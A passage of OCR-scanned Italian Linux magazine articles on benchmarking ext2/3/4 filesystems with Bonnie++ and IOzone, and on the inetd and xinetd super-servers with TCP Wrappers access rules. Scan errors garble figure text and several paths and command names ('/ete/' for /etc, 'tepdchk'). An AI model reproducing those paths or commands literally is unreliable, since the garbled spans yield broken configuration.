produttori ma in realtà ciò avviene abbastanza raramente. Se, 
com'è il caso nei nostri desktop e/o portatili anche con dischi 
USB esterni, consideriamo che l'hard disk è quello acquistato 
o presente all'atto dell'acquisto, l'ottimizzazione rimane nella 
scelta del filesystem e l'impostazione delle opzioni che li con- 
traddistinguono aspetto, questo, che dovrebbe dar luogo ad un 
certo numero di prove per la verifica: ad esempio per ext3 pos- 
siamo impostare tre distinte modalità writeback mode, orde- 
red mode e journal mode e per ognuna di esse verificare se 
otteniamo un miglioramento delle prestazioni senza distogliere 
l'attenzione, però, dall'integrità dei dati e la capacità di recupero 
in caso di crash. 


QUANTI FILESYSTEM?! 


Abbiamo già analizzato (Numero 146 mese di copertina Aprile/ 
Maggio 2013) l'organizzazione delle directory e il loro signifi- 
cato: a quali è possibile dedicare una intera partizione e a quali, 
e perché, sono indivisibili dalla directory radice (la /). Il punto 
ora è scegliere il filesystem per ogni singola partizione poiché 
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M Fig. 1 Panoramica sui filesystem supportati dal kernel 


in alcuni casi potrebbe fare la differenza in termini di prestazio- 
ni. Come visibile in Figura 1, i filesystem supportati dal kernel 
dagli anni della sua nascita sono sempre più numerosi sebbene 
alla fine sia possibile ricondurli in due grandi gruppi. 

Un gruppo più indicato per un ambiente desktop e un gruppo 
più adatto (e creato ad-hoc) per l'accesso a risorse di rete (con- 
divise). Volendo essere pignoli si potrebbe aggiungere un terzo 
gruppo: il supporto ai filesystem per accedere ai dati creati con 
altri sistemi operativi quali Microsoft Windows e Mac OS in 


e “nva 


primis. Per motivi di spazio, nel seguito prenderemo in esame 
solo i più “popolari” utilizzati in ambiente GNU/Linux come 
ex12/3/4, ma questo non vieta a nessuno di effettuare delle prove 
con filesystem differenti (come JFS, XFS, ecc.) operando allo 
stesso modo. Gli esempi che seguiranno sono riferiti ad un hard 
disk non SSD collegato su un canale SATA 2 ma, ancora una 
volta, non c'è limitazione in questo poiché nessuno vieta il cam- 
po di applicabilità a dischi IDE, dischi allo stato solido (SSD), 
esterni USB, laddove si sia adottato LVM (Numero 143 mese di 
copertina Gennaio 2013) o, ancora, una delle tipologie RAID 
(Numero 145 mese di copertina Marzo 2013). 


GLI STRUMENTI 


Oggi come oggi è possibile adottare diversi tool per i bench- 
mark, alcuni dei quali sviluppati dagli stessi produttori degli 
hard disk, sebbene il più delle volte solo per Microsoft Win- 
dows. Per il nostro pinguino possiamo trovare alcune soluzioni 
molto valide e che ci forniscono risultati piuttosto dettagliati 
e indicativi sugli orientamenti. Uno dei possibili software è 
Bonnie++, derivato da Bonnie e che rispetto a esso aggiunge 
diverse caratteristiche interessanti come uno strumento interno 
per creare un output dei test in formato testo nonché in formato 
CSV (Comma Separeted Values) dal quale partire per crea- 
re una pagina ottimamente formattata in html da visualizzare 
con un comune browser. Ma andiamo con ordine e procediamo 
all'installazione che vede un semplice yum install bonnie++ in 
Fedora oppure apt-get install bonnie++ in Debian e derivate. 
Non dovrebbero esserci problemi per le altre distribuzioni poi- 
ché il software è molto diffuso in ambiente GNU/Linux. Termi- 
nata l'installazione possiamo subito passare alla fase di test. Nel 
nostro piccolo, abbiamo allestito tre partizioni da 20GB ognuna 


W Fig. 2 è Le tre partizioni di test con filesystem ext2, ext3 
e ext4! 


(Figura 2) facendo in modo che vengano montate all'avvio su un 
punto di mount come ad esempio /mnt/Provaext2, /mnt/Prova- 
ext3 ecc. È possibile ottenere questo risultato, utilizzando uno 
degli strumenti amministrativi che popolano le nostre distribu- 
zioni e che sono dedicate alla gestione dei dischi: si faccia at- 
tenzione se il disco presenta dei dati! 

Non è necessario seguire questa strada, ma visto che si aveva 
spazio a sufficienza su un hard disk praticamente inutilizzato si 
è optato per questa soluzione. Perché necessitiamo di partizioni 
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uential Input Randa 


W Fig. 3 » L'output è poco leggibile, forse è il caso di 
formattarlo! 


così ampie? Quando si utilizzano software di test per l'hard disk 
a detta di alcuni andrebbe utilizzato uno spazio che sia almeno 
20 volte il quantitativo di RAM installato, pertanto se il compu- 
ter è equipaggiato con 4GB occorrerebbe una partizione di test 
di almeno 80GB. Altri suggerimenti indicano che per avere dei 
risultati che si avvicinino alla realtà occorre una partizione il 
doppio della memoria RAM che poi è il comportamento di de- 
fault di Bonnie++ se non diversamente specificato con l'opzione 
“-s”. Il motivo è legato alla minimizzazione dell'effetto dei file 
caching in RAM sui valori dei test alterandoli apprezzabilmen- 
te. L'uso di base di Bonnie++, e che contempla tutti i test sul 
disco, vede il comando bonnie++ -d /volume/da_testare (man 
bonnie++ o bonnie++ -h per tutte le opzioni) il quale fornirà 
un output come visibile in Figura 3 sicuramente leggibile con 
un po' di impegno ma possiamo di meglio! Durante i test non 
dovremmo utilizzare il computer, per evitare che vengano fal- 
sati, senza contare che durante i test la macchina risulta poco 
efficiente. Bonnie++ esegue due serie di prove all'interno delle 
quali si susseguono una serie di test. 

La prima prova riguarda l'I/O dei file in tre test nominati Se- 
quential Output all'interno del quale vengono eseguite tre se- 
quenze: Per Char scrittura di caratteri su file utilizzando la ma- 
cro pute(), Block che utilizza la funzione write (man 2 write) 


file Modifica Visualizza Vai Segnalibri Strumenti Impostazioni Fnestra Aiuto 
dd CO LS Bè nomermichartempBonnie him 
KB Release Notes [ii Fedora Project ,, [ig Red Hat _, Bg Free Content , 

© ligimemp © | (@ Bonnie++ Benchmark resulte © 


Sequential | 
Input 


Version 


FORMATTARE L'OUTPUT 
Miglioriamo la leggibilità 


Bonnie++ ha uno script Perl [bon_csv2txt) che permette 
la formattazione del risultato su file txt. L'uso è sem- 
plice: terminato il test si copia l'ultima riga e si lancia il 
comando echo "...ultima riga..." | bon_csv2txt > /home/ 
nome_utente/File_test.txt: questa modalità è utile, ad 
esempio, per la lettura su display Braille. È anche possi- 
bile formattare l'output al fine di visualizzarlo come una 
normale pagina web statica. Lo strumento bon_csv2html 
incluso in Bonnie++ ha proprio questo compito. L'uso è 
analogo al precedente: dovrà essere copiata, a meno di 
adottare la soluzione della redirezione dell'output come 
riportato nell'articolo, l'ultima riga dell'output e impar- 
tire ilcomando echo "...ultima riga..." | bon_csv2html > / 
home/nome_utente/File_test.html. 


per la creazione dei file e infine Rewrite, nel quale il file viene 
prima letto attraverso la funzione read (man 2 read) quindi al- 
terato e riscritto di nuovo con la funzione write: quest'ultimo 
valore dovrebbe essere quello che si avvicina maggiormente al 
reale data transfer rate del disco. 

Ulteriore test è Sequential Input con due sotto-test analoghi al 
Sequential Output ma che riguardano la lettura dei file nella 
modalità Per Char e Block. Infine, abbiamo Random Seeks 
che effettua delle ricerche casuali facendo uso delle funzioni 
Iseek (man 2 lseek) e drand48 (man 3 drand48). La seconda 
prova vede la creazione di file in modalità sequenziale (Sequen- 
tial Create) e casuale (Random Create) utilizzando opportune 
specifiche. Per gli approfondimento si rimanda alla pagina www. 
coker.com.au/bonnie++/readme.html. Nel risultato di Figura 3 
possiamo notare la dicitura 8GB, ovvero la dimensione totale 
del data set utilizzato sull'hard disk (nella partizione da 20GB) 
pari esattamente al doppio della RAM installata e tutta un'altra 
serie di dati che andremo a formattare in maniera più adeguata. 
Leggiamo il Box “Formattare l'output” quindi eseguiamo le 


Sequential Create Random Create 


Per Char [aio 


Delete [creste 


[aero 


ue ___<> 


se 
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N Fig.4*1colori sono indicativi del risultato delle prestazioni sui singoli test 
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prove sulle nostre tre partizioni, ognuna con il suo filesystem, 
utilizzando il comando: 


bonnie++ -d /mnt/Provaext2 -m "Ext2" -q >> /home/1 
nome utente/Confronto.csv 


sostituendo Provaext3 e Provaext4 in luogo di Provaext2 nelle 
successive prove, in modo tale da originare tre test distinti su 
ext2, ext3 e ext4. Abbiamo utilizzato l'opzione -m per etichet- 
tare il test, etichetta che apparirà nell'output, e l'opzione -q per 
redirigere l'output su un file csv. Al termine dei test, ci ritro- 
veremo con un solo file csv (notare l'operatore di redirezione 
in coda “>>” ) di nome Confronto, contenente i risultati sulle 
tre partizioni ext2, ext3 e ext4. Il file csv convertito in HTML 
(bon_esv2html Confronto.csv > Confronto.html) e aperto con 
un normale browser Web ci permetterà di fare subito un con- 
fronto tra i tre filesystem testati (Figura 4). 

Osserviamo come le voci riportate in precedenza siano ben alli- 
neate e facilmente leggibili. La presenza di multipli “+” indica 
che l'esecuzione del test è stata talmente veloce che non è pos- 
sibile darne un risultato ragionevole senza incorrere in grosso- 
lani errori. In questi casi per ottenere un risultato almeno un 
po' accettabile potrebbe essere utile impostare il numero di file 
da creare utilizzando l'opzione “-n” (man bonnie++). Ogni test 
può prendere diversi minuti a seconda della velocità del disco e 
delle richieste attraverso le opzioni. 


GRAFICI PIÙ "SPINTI" 


Con la formattazione in HTML possiamo sicuramente confron- 
tare i risultati, ma non ci fornisce quella immediata leggibilità 
che potrebbero darci, ad esempio, degli istogrammi che po- 
trebbero essere un utile complemento ai nostri test. È possibile 
anche questa operazione utilizzando Bonnie2GChart (https:/ 
github.com/pommi/bonnie2gchart). Poiché è scritto in PHP, per farlo 
funzionare dobbiamo installare il server web Apache e l'inter- 
prete PHP. Su una distribuzione Fedora, l'operazione si compie 
semplicemente utilizzando il comando yum install httpd php. 
Eseguita l'installazione, avviamo il server WEB in caso di uso di 


lAnimzato nidi Lau 


W Fig. 5 è Schermata di Apache a sinistra e informazioni su 
PHP a destra 


“ CPU usage În % (lower is better) 


Block 10 CPU 


W Fig. 6 è L'uso di istogrammi e tips a comparsa rende il 
confronto immediato! 


Systemd service httpd start; mentre, se la distribuzione utilizza 
SystemV, impartiremo, sempre da amministratore, l'istruzione / 
ete/init.d/apache2 start. Puntando il browser all'indirizzo http:/ 
localhost dovremo vedere la schermata di benvenuto di Apache. 
Ora creiamo con un editor di testo un file php contenente la riga: 


<?php phpinfo();?> 


salviamolo come info.php in /var/www/html e puntiamo il 
browser all'indirizzo http://localhost/info.php: dovremo vedere 
la schermata di informazioni su PHP. Se tutto è andato per il 
meglio (Figura 5) possiamo scaricare Bonnie2GChart, file bon- 
nie2gchart-master.zip da circa 16KB, copiarlo in /var/www/ 
html e decomprimerlo. 

Verrà creata la cartella bonnie2gchart-master (che potremo rino- 
minare come meglio crediamo) all'interno della quale è presente 
un file di esempio bonnie.csv che cancelleremo (o lo rinomi- 
neremo) per far posto al nostro file che dovremo rinominare in 
bonnie.csv. A questo punto, se apriamo il browser all'indirizzo 
htip://localhost/bonnie2gchart-master/index.php dovrebbe apparirci un 
menù di 8 voci: su ognuna delle quali avremo una ben precisa 
sequenza di istogrammi in funzione dei risultati ottenuti dai no- 
stri test (Figura 6). 


QUANDO IL 3D DIVENTA ARTE! 


In rete si possono trovare diversi test effettuati con i due stru- 
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menti che abbiamo riportato e che possono fungere da ottimo 
punto di raffronto per le analisi che effettuiamo in casa. Inol- 
tre, c'è un terzo programma molto avanzato per effettuare test 
rigorosi e disponibile anche per GNU/Linux, stiamo parlando 
dell'ottimo IOzone (http:/www.iozone.org/). In Fedora 20, il sof- 
tware è approvato per la pacchettizzazione ma, al momento di 
scrivere, ancora non è stato implementato. Implementazione 
che è presente invece in OpenMandriva 2014 alpha 1, pertanto 
si verifichi la presenza del pacchetto nei repository della pro- 
pria distribuzione. 

In assenza di un pacchetto precompilato, è sufficiente scaricarne 
i sorgenti (iozone3_420.tar), estrarre l'archivio con il comando 
tar xvf iozone3_420.tar, entrare nella cartella dei sorgenti (cd 
iozone3_420/src/current) e lanciare il comando make seguito 
dal target, nel nostro caso make linux-AMD64, per avere dopo 


pochi secondi l'eseguibile iozone già pronto. 

Come utilizzarlo per i test? Il numero di parametri e test che 
è in grado di svolgere è ancora più ampio rispetto a Bonnie++ 
pertanto non possiamo che rimandarvi al manuale in linea o alla 
documentazione nei sorgenti. 

Il test che abbiamo condotto è stato quello di impartire, da utente 
normale, il comando: 


./iozone -Rac -b Risultati.ods -n 64 -g 1G -M 51 
Risultati.out 


nella cartella dei sorgenti compilati per avere, circa 30 minuti 
dopo, i risultati per il filesystem ext4 illustrati nel tutorial. As- 
sicuriamoci di avere il software Gnuplot (htip://Amww.gnuplot.info/) 


installato. 


Visualizziamo i risultati! 


Dal “semplice” foglio elettronico fino a diagrammi 3D complessi! 
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Tredici è il numero dei test eseguiti da IOzone 

utilizzando il comando riportato nell'articolo. 
Gli esiti verranno riportati nei due file indicati ovve- 
ro Risultati.ods e Risultati.out. Il primo è un file che 
possiamo aprire con LibereOffice Calc e che ci mostra 
la sequenza dei risultati. 
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GRAFICI 

Se siamo bravi con un foglio elettronico possia- 
mo, cimentarci con la creazione di spettacolari 
grafici 2D e/o 3D da implementare in eventuali presen- 
tazioni. In figura, un tipico esempio, creato in pochi se- 
condi: sul sito di lOzone ne sono visibili altri unitamente 
ad un file di esempio da scaricare e lanciare. 


GNUPLOT! 

Se i fogli di calcolo non sono il nostro forte 

è opportuno far disegnare i grafici 3D a “chi 
lo sa fare”! Nel pacchetto di lOzone è compreso un 
file di testo di nome Generate_Graphs. Quello che 
dobbiamo fare è lanciare il comando ./Generate_Gra- 
phs Risultati.out per avere i grafici in 3D con tanto di 
creazione di documento in ps da poter convertire in 
pdf! 
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noto come l'avvio di un sistema operativo come GNU/ 

Linux sia legato indissolubilmente al lancio di un certo 

numero di servizi (della cui dinamica ci siamo occupati 
in articoli recenti, ad esempio nel numero 148 dove abbiamo 
spiegato il funzionamento di Systemd). Intuitivamente, la si- 
curezza di un sistema tende ad aumentare intrinsecamente nel 
momento in cui i servizi non necessari vengono lasciati spenti e 
quelli utilizzati una tantum avviati solo al momento del bisogno. 
L'avvio di un servizio (d parte di un utente o di un altro servizio) 
è possibile utilizzando opportuni strumenti che potranno essere 
visti come distributori di risorse. 


L'IDEA DI BASE 


Il Super-server (o Super-dacmon) deve il nome alla sua capacità 
di controllare il lancio di altri servizi/demoni. Il funzionamento 
è abbastanza intuitivo: si pone in ascolto su un certo numero di 
porte di rete, ad ognuna delle quali è associato necessariamen- 
te uno specifico servizio. L'abbinamento porta-servizio è legato 
alla configurazione, ovvero alle direttive che l'amministratore 
fornirà allo stesso super-server. 

Nel momento in cui arriva una richiesta ad una delle porte con- 
trollate, avrà inizio tutta la procedura necessaria che permetterà 
l'avvio del servizio richiesto (compresa l'analisi delle varie rego- 
le di sicurezza, se impostate). 

Sarà quindi possibile verificare se la richiesta di avvio del ser- 
vizio proviene da una struttura autorizzata e, di conseguenza, se 
accettare o negare la richiesta. La dinamica è visibile in Figura 
1 e nella quale siamo rimasti volutamente sul generico rappre- 
sentando il tutto come una “scatola nera”. Il super-server incon- 
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UTILIZZARE | SUPER- 
SERVER PER AVVIARE 
I SERVIZI 


A seconda dello stato di installazione della nostra distribuzione, 
potremmo trovarci di fronte a un elevato numero di servizi 
avviati. Analizziamo una possibile modalità di gestione per 
ottimizzare il comportamento del sistema 


Michele Petrecca 


trastato per moltissimi anni nelle distribuzioni GNU/Linux, e in 
genere in tutti i sistemi Unix/Unix-like, è stato inetd (Internet 
services daemon). 

Con il tempo, però, ha mostrato tutti i suoi limiti ed è stato sosti- 
tuito con Xinetd (extended Internet services daemon) avente 
maggiore versatilità e flessibilità nella configurazione e un oc- 
chio più attento alla sicurezza, elementi, questi, che mancavano 
al suo progenitore. Prima di procedere, è bene precisare che i 
processi possono dividersi in due categorie: quelli lanciati du- 
rante la fase di avvio (deamon mode o stand alone) dal padre 


Client 1 
192.168.11.23 


192.168.11.123 


® Fig. 1 Principio di funzionamento di base di un super-server. 


di tutti i processi init (o da systemd oramai in buona parte delle 
distribuzioni) e quelli su esplicita richiesta da parte di un altro 
utente o servizio (modalità nota come SuperDaemon o On De- 
mand) e/o che possono essere resi tali previa riconfigurazione. 


SUPER-SERVER SÌ 
SUPER-SERVER NO! 


Prima di entrare nel merito della configurazione e della possibile 
applicazione di un super-server, è necessario fare alcune conside- 
razioni che possano chiarire i motivi di una sua eventuale scelta. 
Oltre all'aspetto della intrinseca sicurezza, ovvero servizi non 
lanciati quando non servono, l'uso di un super-server potrebbe 
portare ad una ottimizzazione delle risorse. 

Questo perché il servizio controllato, qualunque esso sia, non 
verrà avviato finché non vi sarà una richiesta esplicita (ammesso 
che ne arrivi una) ad opera di un processo, di un utentein LAN o 
in remoto da un'altra parte del mondo. 

Ma allora perché abbiamo utilizzato il condizionale “potrebbe”? 
È evidente come i servizi lanciati all'avvio richiedano fin da su- 
bito l'allocazione delle risorse ad essi necessari (CPU, memoria 
RAM, ecc.) e questo indipendentemente se il compito dei servizi 
avviati verrà o meno richiesto durante l'uptime della macchina. 
Per un servizio on demand, invece, non necessitiamo di allocare 
risorse almeno fino a quando non arriva una richiesta di attiva- 
zione. 

A prima vista sembra immediata la convenienza di un servizio on 
demand, ma nel momento in cui ci poniamo la domanda “Ma per 
quanto tempo e con quale frequenza viene utilizzato il servizio 
che abbiamo impostato in modalità Super-daemon?” lo scenario 
potrebbe cambiare in favore di un servizio stand alone. 
Indagando un po' di più sulla dinamica di funzionamento riporta- 
ta in Figura 1, ci accorgeremo come le prestazioni di un servizio 
on demand sono sicuramente inferiori ad uno stand alone. 

Infatti nel momento in cui arriva una richiesta il Super-server do- 
vrà far allocare le risorse necessarie al processo che dovrà avvia- 
re, non prima, però, di aver letto i propri file di configurazione. 
A questo punto se il servizio viene concesso si dovrà provvedere 
al caricamento in memoria del demone figlio e quindi l'esecu- 
zione del servizio legato alla richiesta il quale, a sua volta, dovrà 
andarsi prima a leggere i propri file di configurazione quindi ac- 
cettare la richiesta e, finalmente, fornire il servizio! Dunque, in 
presenza di servizi a bassa frequenza di richiesta, si può pensare 
all'uso di un Super-server: ad esempio nella propria rete LAN (ma 
non solo) il pensiero corre subito a servizi come la condivisione 
di risorse con Samba, trasferimento file via FTP, login remoto via 
SSH, connessioni telnet, analisi remote etc. 


IL “VECCHIO” INETD 


Lo storico Super-server Inetd, presente fin dalla notte dei tempi 
su sistemi Unix e Unix-like compreso GNU/Linux, è stato grada- 
tamente sostituito e da qualche anno in maniera definitiva da Xi- 
netd. Per questo motivo non approfondiremo l'uso di un program- 
ma oramai “dismesso”, ma daremo comunque un'occhiata al suo 
file di configurazione e al suo funzionamento di base, rimasto 
pressoché invariato negli anni, perché ci permetterà di compren- 
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UN REDIRECTOR TCP 


inetd non lo sa fare! 


L'operazione di redirigere il traffico di rete da una porta 
ad un'altra è nota con il termine di port forwarding. Inetd 
non e In grado di espletare questa operazione ed è per 
questo motivo che qualora occorresse un port forwar 
ding — per dirla come e riportato sul sito del progetto 
redirezionare connessioni TCP da una coppia IP/porta 
ad un'altra coppia |P/porta"” si ricorreva, e si continua 
a ricorrere in quei casi dove si utilizza Inetd, a rinetd 


(Remote Inetd —- http://www.boutell.com/rinetd/) e il cui file 


di configurazione è /etc/rinetd.conf 


dere la dinamica di base di un super-server. La configurazione di 
Inetd era affidata al file /ete/inetd.conf caratterizzato da sette 
campi così definiti: 


servizio tipo socket protocollo flag utente 1 
percorso server argomenti 


Il campo servizio e protocollo, e pertanto lo stesso file di confi- 
gurazione inetd.conf, fanno riferimento a due file esterni, rispet- 
tivamente /ete/services e /ete/protocols. Il file services contie- 
ne le corrispondenze fra servizi di rete e numeri di porta a loro 
assegnati: ad esempio TCP 15 è associato a Netstat, TCP 23 a 
Telnet, TCP 123 a NTP e così via discorrendo. È un comune file 
di testo a cui fanno riferimento diversi programmi nei cui file di 
configurazione utilizzano il nome simbolico del servizio (come 
è il caso per Inetd), per “capire” che cosa avviare in funzione di 
una richiesta pervenuta su una data porta. Anche il file protocols 
è un normale file di testo e come il file services contiene corri- 
spondenze tra valori numerici e nomi simbolici, solo che questa 
volta l'associazione, per ogni singola riga del file, è tra il nome del 
servizio e la coppia porta-protocollo seguito eventualmente da un 
alias: contiene le informazioni riguardanti i protocolli conosciuti 
e assegnati dallo IANA (Internet Assigned Numbers Authority 
— https://www.iana.0rg/). Nel campo servizio deve essere presen- 
te una delle voci riportata nel file services quali netstat, ftp, ssh 
etc mentre nel campo protocollo una delle parole chiavi riportate 
in /ete/protocols, in genere tcp e udp sono i protocolli usati per 
la maggiore a volte associati a rpc (Remore Procedure Call) nel 
modo rpe/tep 0 rpe/udp. Altro campo valevole di nota è flag: 
può assumere i valori di wait o nowait. Impostare wait significa 
ordinare a Inetd di eseguire una sola istanza del servizio richie- 
sto riassegnando il socket solo al termine. Viceversa, con nowait 
verranno accettate più istanze del servizio: questa modalità di 
funzionamento diventa utile quando un singolo processo non è in 
grado di smaltire le richieste oppure quando si è in presenza di 
processi multi-threaded. È importante osservare che, di default, 
le invocazioni per minuto sono pari a 40, ma può essere diminuito 
o aumentato a seconda delle necessità. Il valore è tenuto a una 
invocazione ogni 1,5 secondi al fine di evitare/contenere attacchi 
DoS che potrebbero portare un'incapacità di gestione della mac- 
china ad opera dell'amministratore causa mancanza di risorse! 
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Questa per grandi lince la configurazione di Inetd, dalla quale 
possiamo osservare che al di là del campo flag non c'è alcuna se- 
zione dedicata e che riguardi in maniera più specifica e puntuale 
la sicurezza. 

Se impostiamo, ad esempio, un server FTP sulla nostra macchi- 
na chiunque può fare la richiesta? La risposta è senz'altro affer- 
mativa a meno di avere un firewall opportunamente configurato. 
Va da sé che questo è un importante buco sulla sicurezza a cui 
occorre porre rimedio! Ma c'è di più perché Inetd non permette 
l'operazione di forwarding così come riportato nel Box “Un redi- 
rector TCP”. 


UN LIVELLO IN PIÙ 


Per risolvere il problema di sicurezza indotto dall'uso di Inetd, 
si era soliti associare un ulteriore livello software che permet- 
teva (e che permette tutt'oggi se adeguatamente configurato) il 
controllo e il filtro degli accessi ai servizi di sistema. Il nuovo 
livello è TCP Wrapper (ftp://ftp.porcupine.org/pub/security/in- 
dex.html) dello sviluppatore/professore Olandese Wietse Vene- 
ma. Poiché TCP Wrapper può essere utilizzato anche dal super- 
server Xinetd attraverso le librerie condivise allora è opportuno 
analizzarne in maniera un po' più dettagliata il funzionamento. 
Concettualmente rimane tutto abbastanza semplice: il super- 
server invece di lanciare il demone figlio, invocherà un inter- 
mediario — TCP Wrappers nel nostro caso - che prenderà in 
consegna la richiesta di servizio pervenuta su una delle porte 
controllate. 

A questo punto, verrà effettuato un certo numero e tipo di con- 
trolli prima di dare il consenso al servizio o rigettarne la richie- 
sta. Le modalità d'uso sono due: 


- la prima vede il demone tcpd fare da involucro (da cui il termi- 
ne wrapper) per l'esecuzione di altri programmi come avveniva 
ad esempio con Inetd. 


Client 1 


hosts.allow 


Servizio 1 


Client 2 


- la seconda prevede l'uso, direttamente dal demone che fornisce 
il servizio (super-server compreso), delle librerie di controllo 
dei TCP Wrappers: così facendo è il demone stesso che è in 
grado di utilizzarne le funzioni. 

La Figura 2 illustra il principio di funzionamento del TCP 
Wrappers alla cui base troviamo i suoi due file di configurazio- 
ne, /ete/hosts.allow e /ete/hosts.deny. 

Il primo, hosts.allow, contiene l'elenco degli host ai quali è per- 
messo l'accesso al servizio, mentre nel file hosts.deny verranno 
elencati gli host da bandire da un certo numero e tipo di servizi. 
La dinamica è sequenziale (in Figura 2 da sinistra verso de- 
stra): verrà letto dapprima il contenuto del file hosts.allow e solo 
dopo verrà passato in rassegna il file hosts.deny e in ogni caso 
l'analisi si arresta alla prima occorrenza, pertanto hosts.allow 
ha la precedenza sul contenuto di hosts.deny. 

Questo vuol dire che in presenza di regole differenti per uno 
stesso servizio, prevarrà la regola impostata nel file hosts.al- 
low. Inoltre in assenza di regole il comportamento predefinito 
sarà quello di fornire servizio al richiedente! Premesso ciò, la 
struttura dei file di configurazione è piuttosto semplice: 


lista dei demoni : lista_dei_client : comandi 


Nel primo campo verrà riportata la lista dei demoni/servizi da 
controllare; nel secondo campo i client richiedenti il servizio 
riportato nella lista dei demoni/servizi: l'ultimo campo (opzio- 
nale) indica un comando che dovrà essere eseguito qualora si 
verifichi la corrispondenza dei primi due campi. 

Una eventuale lista di elementi nel primo e nel secondo campo 
andranno separati con uno spazio o con una virgola. 

Nella lista di elementi è permesso l'uso di wildcard (come ALL 
che indica che la regola è sempre verificata, LOCAL che assu- 
me per vera la regola nel nome degli host che non contengono 
un punto, quindi locali) e altre regole le quali vi rimandiamo 
al manuale in linea (man hosts_access). In genere, i due file 


W Fig. 2 è Attenzione al comportamento predefinito di TCP Wrappers in assenza di regole! 
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non presentano regole di default, pertanto, come amministrato- 
ri, dovremo scriverle ad-hoc in base alle necessità. Ad esempio 
potremmo immaginare uno scenario in una rete LAN che vede 
il file hosts.deny avere le regole: 


ALL: ALL 


ad indicare nessun servizio per nessun host. Se nel file hosts. 
allow non venisse scritta alcuna regola ecco che ci troveremo 
davanti a un sistema completamente chiuso poiché tutte le ri- 
chieste verranno bloccate. 

Come esempio introduttivo immaginiamo, invece, che hosts.al- 
low presenti le seguenti righe: 


in.tftpd : ALL 
sshd 192.168.0.0/255.255.254.0 EXCEPT 1 
192.168.1.10 
in.telnetd : ALL EXCEPT 10.0.0.5, LOCAL 
(/bin/mail -s “Una connessione Telnet 
da %a ut” root) & 


spawn 1 


Cosa ci “dicono” queste tre righe? La prima che l'accesso al 
servizio tftp è permessa a tutti. Il servizio SSH, seconda riga, 
è permesso a tutti gli indirizzi degli host che presentano un in- 
dirizzo da 192.168.0.0 fino a 192.168.1.255 ad eccezione del 
192.168.1.10. L'ultima riga permette connessioni telnet a tutti 
gli utenti, compreso quelli in locale, eccetto l'indirizzo 10.0.0.5. 
In più, qualora si dovesse verificare la corrispondenza, attraver- 
so la direttiva spawn, che permette di lanciare un comando shell 
come processo figlio, dovrà essere inviata una mail di avviso 
all'amministratore contenente il messaggio “Una connessione 
Telnet da host-utente” (le espansioni %a e %u rispettivamente). 
Regole lunghe possono essere scritte su una nuova riga inseren- 
do il backslash (\) prima di andare a capo. 

Quando terminiamo la scrittura delle regole ricordiamoci di in- 
serire un new line (Invio) al termine altrimenti riceveremo un 
warning all'atto delle analisi delle regole. 

Per motivi di spazio non possiamo fornire ulteriori esempi, ma 
alcuni è possibile visionarli nel manuale in linea (man hosts_ 
access) e al solito solo un po' di pratica potrà farci prendere la 
dovuta confidenza con i pattern, le espansioni, le wildcard e gli 
operatori della sintassi. Qualora si dovesse riscontrare qualche 
problema ci si può sempre rivolgere al forum di Linux Magazine 
(http://www.linux-magazine.it/forum/). 

Prima di terminare facciamo presente che è possibile testare la 
sintassi e simulare l'applicazione utilizzando due strumenti in- 
clusi nel pacchetto TCP Wrapper: il programma tepdchk (man 
tcpdchk) per la verifica della correttezza sintattica e tepdmatch 
(man tcpdmatch) per verificare che le regole svolgano esatta- 
mente il compito che abbiamo in mente. 


LA NUOVA GENERAZIONE! 


Dall'esperienza condotta con Inetd negli anni, gli addetti ai la- 
vori (semplici utenti, sistemisti, ecc.) di volta in volta fornivano 
i propri feedback per cercare di migliorarne le caratteristiche. 
Queste continue richieste hanno dato vita ad una riscrittura 
dell'Internet Service Deamon che ha portato alla nascita di Xi- 
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netd. Questa nuova formulazione del super-server vede l'inclu- 
sione di diverse nuove caratteristiche. 

Ad esempio, il supporto nativo a TCP Wrappers attraverso l'uso 
delle librerie condivise libwrap.so e del controllo degli accessi 
(come è facile verificare utilizzando il comando ldd /usr/sbin/ 
xinetd | grep libwrap e strings /usr/sbin/xinetd | grep hosts. 
access) a cui vanno aggiunte le capacità di gestire i servizi a 
orari stabiliti, redirigere le connessioni senza ricorrere a rinetd, 
estesi meccanismi di gestione degli eventi e di protezione nei 
confronti delle scansione delle porte, possibilità di limitare il 
numero di istanze da lanciare (prevenendo così attacchi DoS) e 
in più è retro-compatibile con Inetd attraverso l'uso dell'opzione 
-inetd_compat quindi con possibilità d'utilizzo di un file inetd. 
conf. Premesso ciò, la dinamica di funzionamento è simile a 
quanto riportato per Inetd. 

Nel momento in cui Xinetd riceve una richiesta di connessione 
ad un servizio la prima cosa che va a fare è verificare le rego- 
le di accesso dei TCP Wrappers (se impostate). Se l'accesso è 
permesso verifica come ulteriore passaggio che la connessione 
al servizio richiesto sia permesso dalle proprie regole interne. 
Se questo ulteriore controllo viene superato verrà avviata una 
istanza del servizio richiesto passandole il controllo della con- 
nessione. 

Stabilita la connessione Xinetd esce di scena lasciando la ge- 
stione della comunicazione alla coppia client/host ® server. Il 
file di configurazione globale è affidato a /ete/xinetd.conf al 
quale vanno aggiunti un certo numero di file creati ad-hoc nella 
cartella /ete/xinetd.d per ogni specifico servizio in base alle 
proprie necessità. 

Se nella distribuzione in uso è presente il pacchetto xinetd-sim- 
ple-services, suggeriamo di installarlo poiché fornisce ulteriori 
file di configurazione che verranno installati in /etc/xientd.d/, 
file dai quali è possibile trarre spunto per una studiare la sin- 
tassi e ritornare utili per una propria configurazione. Altro file 
di esempio è sample.conf in /usr/share/doc/xinetd. Le direttive 
vengono inglobate all'interno di parentesi graffe in una sequen- 
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za di entry. In Figura 3 è visibile il file xinetd.conf di una Open- 
Mandriva 2014.0 nel quale è presente solo la sezione defaults: 
altre distribuzioni potranno avere configurazioni differenti. La 


sintassi nella sua forma generica è: 


service nome servizio 


{ 


attributo operatore valore 


Nel nostro esempio, la sezione defaults contiene le regole da 
applicare a tutti i servizi indistintamente laddove non esplicita- 
mente definiti. 

Il file termina con la direttiva includedir che richiede come 
argomento dove leggere ulteriori file di configurazione, nello 
specifico /ete/xinetd.d. Analizziamo le direttive presenti ricor- 
dando che per motivi di spazio non possiamo elencarle tutte e 
rimandandovi perciò ai manuali in linea (man 8 xinetd, man 5 
xinetd.conf e man 5 xinetd.log per il sistema di logging inte- 
grato). 

Il primo attributo è instances ad indicare il numero massimo di 
processi che verranno lanciati per ogni servizio e ciò al fine di 
calmierare eventuali attacchi DoS. La log_type indica la meto- 
dologia di registrazione dei log. Con Xinetd i log possono esse- 
re inviati o all'interfaccia di SysLog nel qual caso dovrà essere 
riportata la facility tra deamon, auth, authpriv, user, mail, Ipr, 
news, uucp, ftp e local0-7. 

Opzionalmente, il livello di priorità tra emerg, alert, crit, err, 
